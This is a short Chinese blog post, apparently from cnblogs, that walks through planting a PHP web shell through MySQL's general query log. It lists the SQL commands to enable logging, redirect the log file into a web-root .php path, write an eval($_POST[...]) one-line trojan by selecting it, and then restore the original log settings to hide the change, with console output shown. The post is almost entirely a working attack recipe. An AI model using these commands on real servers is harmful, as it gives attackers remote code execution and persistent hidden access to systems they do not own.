利用mysql数据库的日志 添加一句话木马
- 查看配置
show variables like '%general%';
mysql> show variables like '%general%';
+------------------+--------------------------------------------------------+
| Variable_name | Value |
+------------------+--------------------------------------------------------+
| general_log | OFF |
| general_log_file | D:\wamp\bin\mysql\mysql5.6.17\data\DESKTOP-U3B8JVN.log |
+------------------+--------------------------------------------------------+
2 rows in set (0.11 sec)
- 开启general log模式
set global general_log = on;
- 设定日志文件的位置
set global general_log_file = 'd:\\wwwroot\\test.php';
set global general_log_file = 'D:\\wamp\\www\\mysql_log\\codervibe_shell.php';
<?php @eval($_POST['codervibe']); ?>
- 插入 一句话木马
select '<?php @eval($_POST['codervibe']); ?>';
mysql> select '<?php @eval($_POST['codervibe']); ?>'
- 关闭general log模式
set global general_log = off;
- 连接完成后 将位置还原回 原来的设定并关闭
set global general_log_file = 'D:\\wamp\\www\\mysql_log\\codervibe_shell.php';
set global general_log_file = 'D:\\wamp\\bin\\mysql\\mysql5.6.17\\data\\DESKTOP-U3B8JVN.log';
- 关闭数据库日志
set global general_log = off;
mysql> show variables like '%general%';
+------------------+--------------------------------------------+
| Variable_name | Value |
+------------------+--------------------------------------------+
| general_log | ON |
| general_log_file | D:\wamp\www\mysql_log\codervibe_shell2.php |
+------------------+--------------------------------------------+
2 rows in set (0.00 sec)
mysql> set global general_log_file = 'D:\\wamp\\bin\\mysql\\mysql5.6.17\\data\\DESKTOP-U3B8JVN.log';
Query OK, 0 rows affected (0.09 sec)
mysql> set global general_log = off;
Query OK, 0 rows affected (0.06 sec)
总结
show variables like '%general%'; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file = 'd:\\wwwroot\\test.php'; #设置日志目录为shell地址
select '' #写入shell
set global general_log=off; #关闭general log模式
本文来自博客园,作者:ZapcoMan,转载请注明原文链接:https://www.cnblogs.com/ZapcoMan/articles/18455040
